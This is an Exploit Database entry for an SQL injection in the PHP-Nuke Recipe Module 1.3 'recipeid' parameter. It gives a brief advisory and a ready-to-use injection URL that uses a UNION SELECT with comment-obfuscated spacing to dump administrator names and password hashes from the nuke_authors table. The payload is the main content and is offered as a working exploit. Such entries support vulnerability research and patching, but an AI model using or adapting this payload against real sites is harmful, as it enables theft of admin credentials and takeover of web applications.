Exploit Database - Logo

PHP-Nuke Recipe Module 1.3 - 'recipeid' SQL Injection

EDB-ID: 31287 Author: S@BUN Published: 2008-02-23
CVE: CVE-2008-7226 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/27955/info

The Recipe module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Recipe 1.3 is vulnerable; other versions may also be affected.

http://www.example.com/modules.php?name=Recipe&recipeid=-000/**/union+select+0,pwd,0,0x3a,0x3a,0,aid,aid,pwd,0,0,0,0,0x3a,0,0/**/from/**/nuke_authors/*
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2008-7226
Trying to match OSVDBs (1): 52224
Other Possible E-DB Search Terms: PHP-Nuke Recipe Module 1.3,  PHP-Nuke Recipe Module
Date D V Title Author
No matches
Menu